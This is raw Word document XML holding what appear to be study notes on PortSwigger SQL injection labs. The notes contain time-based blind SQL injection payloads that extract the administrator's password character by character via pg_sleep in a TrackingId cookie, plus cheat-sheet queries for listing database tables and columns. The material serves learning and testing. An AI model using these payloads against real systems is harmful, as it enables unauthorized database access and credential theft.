          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="274e13"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="c9211e"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inspect why one works and other does not : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="274e13"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">One is another </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="274e13"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">statement</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="274e13"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:fill="d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> while the first one is concatenation of that with the reset so it cannot be another statment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> TrackingId=vGRXjPS6nJis2yqY' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="red"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT CASE WHEN (SUBSTRING(password,1,1)='§20§') THEN pg_sleep(50) ELSE  pg_sleep(0)  END FROM users  WHERE username='administrator'--;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.4d34og8" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> TrackingId=vGRXjPS6nJis2yqY'</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="darkYellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> %3B </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT CASE WHEN (SUBSTRING(password,1,1)='§20§') THEN pg_sleep(50) ELSE  pg_sleep(0)  END FROM users  WHERE username='administrator'--;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000090">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000091">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">select pg_sleep(10) works when used with batch statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000092">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remember, or condition or and condition with sleep have not been tried</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000093">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
          <w:i w:val="0"/>
          <w:smallCaps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150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">https://portswigger.net/web-security/sql-injecti</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on/cheat-sheet</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:spacing w:after="150" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>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can list the tables that exist in the database, and the columns that those tables contain.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table4"/>
        <w:tblW w:w="9025.0" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1547"/>
        <w:gridCol w:w="7478"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1547"/>
            <w:gridCol w:w="7478"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>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 FROM all_tables</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'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Microsoft</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 FROM information_schema.</w:t>
            </w:r>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tables</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br w:type="textWrapping"/>
              <w:t xml:space="preserve">SELECT * FROM information_schema.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:cs="Courier" w:eastAsia="Courier" w:hAnsi="Courier"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:strike w:val="0"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:highlight w:val="yellow"/>
                <w:u w:val="none"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">columns</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WHERE table_name = 'TABLE-NAME-HERE'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PostgreSQL</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 FROM information_schema.tables</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'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SELECT * FROM information_schema.tables</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'</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Liberation Mono"/>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paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00265B71"/>
    <w:pPr>
      <w:spacing w:afterAutospacing="1"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Heading"/>
    <w:next w:val="TextBody"/>
    <w:qFormat w:val="1"/>
    <w:pPr>
      <w:spacing w:after="120" w:before="140"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Serif" w:cs="DejaVu Sans" w:eastAsia="DejaVu Sans" w:hAnsi="Liberation Serif"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="DefaultParagraphFont" w:default="1">
    <w:name w:val="Default Paragraph Font"/>
    <w:uiPriority w:val="1"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Heading2Char" w:customStyle="1">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00265B71"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
      <w:lang w:eastAsia="en-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="InternetLink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="007C080F"/>
    <w:rPr>
      <w:color w:val="0563c1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007C080F"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:fill="e1dfdd" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="007C080F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="SourceText">
    <w:name w:val="Source Text"/>
    <w:qFormat w:val="1"/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:cs="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono"/>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rtswigger.net/web-security/sql-injection/blind#exploiting-blind-sql-injection-by-triggering-conditional-errors" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://meyerweb.com/eric/tools/den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NZqv0W9kwCdD2tK5J2XVQUg87A==">CgMxLjAyDmgudjNnbWl5ZDg2bmYzMg5oLnlrZDBscGo3OHp6cDIOaC50bG1kbG5zYzJsamIyCmlkLjMwajB6bGwyCWguMWZvYjl0ZTIJaC4zem55c2g3MgloLjJldDkycDAyCWlkLnR5amN3dDIOaC5jNjQ1b2pwMnhuZ3UyCmlkLjNkeTZ2a20yCmlkLjF0M2g1c2YyCGguZ2pkZ3hzMgloLjRkMzRvZzg4AHIhMVNKd3BrUTJoZFdFb0RRNldmVTYzX1MzQkF5ajFGZXRC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